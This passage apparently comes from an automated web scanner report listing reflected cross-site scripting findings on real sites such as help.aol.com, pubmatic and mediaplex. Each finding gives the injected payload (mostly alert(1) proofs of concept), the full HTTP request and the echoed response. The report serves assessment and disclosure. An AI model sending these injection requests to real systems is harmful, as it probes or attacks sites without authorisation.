Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13088

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:promo14ed8";39d6845c6c7:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:promo14ed8";39d6845c6c7:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.87. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/rankings

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 193e1"%3b34ee4aa9b68 was submitted in the REST URL parameter 1. This input was echoed as 193e1";34ee4aa9b68 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball193e1"%3b34ee4aa9b68/rankings HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:54:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13085

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName=":baseball193e1";34ee4aa9b68:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1=":premium content:baseball193e1";34ee4aa9b68:error";
s_265.prop12=document.URL.split('?')[0]
...[SNIP]...

5.88. http://fantasysource.sportingnews.com/baseball/rankings [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://fantasysource.sportingnews.com
Path:	/baseball/rankings

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17284"%3bf499440a53d was submitted in the REST URL parameter 2. This input was echoed as 17284";f499440a53d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /baseball/rankings17284"%3bf499440a53d HTTP/1.1
Host: fantasysource.sportingnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 05 May 2011 10:54:22 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 13103

<!DOCTYPE html>
<html>


<!--[if IE 7 ]> <html
...[SNIP]...
<script type="text/javascript">
function runOmni()
{
s_265.pfxID="spr";
s_265.pageName="mlb:rankings17284";f499440a53d:error";
s_265.channel="us.sportnews";
s_265.linkInternalFilters="javascript:,sportingnews.com";
s_265.prop1="mlb:premium content:rankings17284";f499440a53d:error";
s_265.prop12=document.URL.split('?')
...[SNIP]...

5.89. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fonts.citysbest.com
Path:	/k/uni0vle-e.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3eae9<script>alert(1)</script>0cba47d02b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k3eae9<script>alert(1)</script>0cba47d02b4/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000871
Content-Length: 68
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:58:59 GMT
Connection: close

Not Found: /k3eae9<script>alert(1)</script>0cba47d02b4/uni0vle-e.css

5.90. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fonts.citysbest.com
Path:	/k/uni0vle-e.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 63185<script>alert(1)</script>0fabb271aad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /k/uni0vle-e.css63185<script>alert(1)</script>0fabb271aad?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1
Host: fonts.citysbest.com
Proxy-Connection: keep-alive
Referer: http://www.citysbest.com/?icid=navbar_citysbest_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_pers=%20s_getnr%3D1304575100835-New%7C1367647100835%3B%20s_nrgvo%3DNew%7C1367647100836%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Content-Type: text/plain
Status: 404 Not Found
X-Runtime: 0.000740
Content-Length: 68
Vary: Accept-Encoding
Date: Thu, 05 May 2011 00:59:00 GMT
Connection: close

Not Found: /k/uni0vle-e.css63185<script>alert(1)</script>0fabb271aad

5.91. http://help.aol.com/help/microsites/search.do [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://help.aol.com
Path:	/help/microsites/search.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa9ad"><script>alert(1)</script>396e1d41820 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /help/microsites/search.do?aa9ad"><script>alert(1)</script>396e1d41820=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:53:24 GMT
Server: Apache
Set-Cookie: JSESSIONID=8E8C3AA10141FE4A03C8800AF8C9CDEF.help-dtc39; Path=/help
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Set-Cookie: NSC_ofxifmq-b-opjq*80=ffffffffceb4d4b245525d5f4f58455e445a4a423660;expires=Thu, 05-May-2011 10:55:20 GMT;path=/;httponly
Content-Length: 31609

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<script type="text/jav
...[SNIP]...
<TextArea name="aa9ad"><script>alert(1)</script>396e1d41820" style="display:none;visibility:hide">
...[SNIP]...

5.92. http://image3.pubmatic.com/AdServer/UPug [pageURL parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://image3.pubmatic.com
Path:	/AdServer/UPug

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d28ae'-alert(1)-'495b642cc39 was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/d28ae'-alert(1)-'495b642cc39 HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=5B355879-97D3-4AC3-AE3F-540B6CD0770B; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:37 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 512

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.8117935182526708&pageURL=http://www.huffingtonpost.com/d28ae'-alert(1)-'495b642cc39">
...[SNIP]...

5.93. http://image3.pubmatic.com/AdServer/UPug [ran parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://image3.pubmatic.com
Path:	/AdServer/UPug

Issue detail

The value of the ran request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e27af'-alert(1)-'bb8e4024b12 was submitted in the ran parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /AdServer/UPug?operId=2&pubId=19677&pixId=16&ran=0.8117935182526708e27af'-alert(1)-'bb8e4024b12&pageURL=http://www.huffingtonpost.com/ HTTP/1.1
Host: image3.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104.1359_1306933483.1555_1398966889

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:37 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KADUSERCOOKIE=CC005CC7-9E15-4A3C-8AE5-B6DBB9A113AD; domain=pubmatic.com; expires=Fri, 04-May-2012 00:59:37 GMT; path=/
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 512

document.write('<script type="text/javascript" src="http://ads.pubmatic.com/UniversalPixel/19677/16/pixel.js"></script>');
document.write('<iframe name="pbeacon" frameborder="0" allowtransparency="tru
...[SNIP]...
nheight="0" marginwidth="0" scrolling="no" width="0" height="0" style="position:absolute;top:-20000px;" src="http://ptrack.pubmatic.com/AdServer/PugTracker?pixId=16&pubId=19677&ran=0.8117935182526708e27af'-alert(1)-'bb8e4024b12&pageURL=http://www.huffingtonpost.com/">
...[SNIP]...

5.94. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15011"-alert(1)-"5cbe7d4d6c was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:21 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5958
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D59690197315011"-alert(1)-"5cbe7d4d6c");
mpck = "h
...[SNIP]...

5.95. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c6d1'%3balert(1)//28df9a82fdd was submitted in the mpck parameter. This input was echoed as 8c6d1';alert(1)//28df9a82fdd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D5969019738c6d1'%3balert(1)//28df9a82fdd&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:23 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5968
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=5969019738c6d1';alert(1)//28df9a82fdd" target="_blank">
...[SNIP]...

5.96. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bdc3'%3balert(1)//93ec51d6ca8 was submitted in the mpvc parameter. This input was echoed as 2bdc3';alert(1)//93ec51d6ca8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596901973&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=2bdc3'%3balert(1)//93ec51d6ca8 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:27 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5964
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=2bdc3';alert(1)//93ec51d6ca8http://altfarm.mediaplex.com/ad/ck/10105-123060-1629-6?mpt=596901973" target="_blank">
...[SNIP]...

5.97. http://img.mediaplex.com/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5855b"%3balert(1)//5790aae0cca was submitted in the mpvc parameter. This input was echoed as 5855b";alert(1)//5790aae0cca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday10_300x600_DODControl_100blmsMdelightUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596901973&mpt=596901973&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=5855b"%3balert(1)//5790aae0cca HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:02:25 GMT
Server: Apache
Last-Modified: Tue, 03 May 2011 22:09:22 GMT
ETag: "737107-102c-4a266646be880"
Accept-Ranges: bytes
Content-Length: 5964
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
99:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link=5855b";alert(1)//5790aae0cca");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596901973;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b
...[SNIP]...

5.98. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 166e7"-alert(1)-"2899149135e was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e&mpt=596850302&mpvc=http://at.atwola.com/adlink/5113/1649058/0/529/AdId=1456335;BnId=1;itime=596850302;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93309867;kvtid=16r4opq1tvlkml;kvseg=99999:51134:50086:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:54032:51186:56673:56148:57362:56969:60203:56835:56987:56780:50220:56768:56299:56761;nodecode=yes;link= HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.aol.com/ads/load_v7.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408/16228:26209

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:01:32 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 18:52:50 GMT
ETag: "4068a7-1072-4a277c367a480"
Accept-Ranges: bytes
Content-Length: 6032
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F10105-123060-1629-6%3Fmpt%3D596850302166e7"-alert(1)-"2899149135e");
mpck = "
...[SNIP]...

5.99. http://img.mediaplex.com/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/content/0/10105/123060/PF_Mday11_300x600_DODControl_1Dznastchoc20asttulipchocUltmdg.js

Issue detail

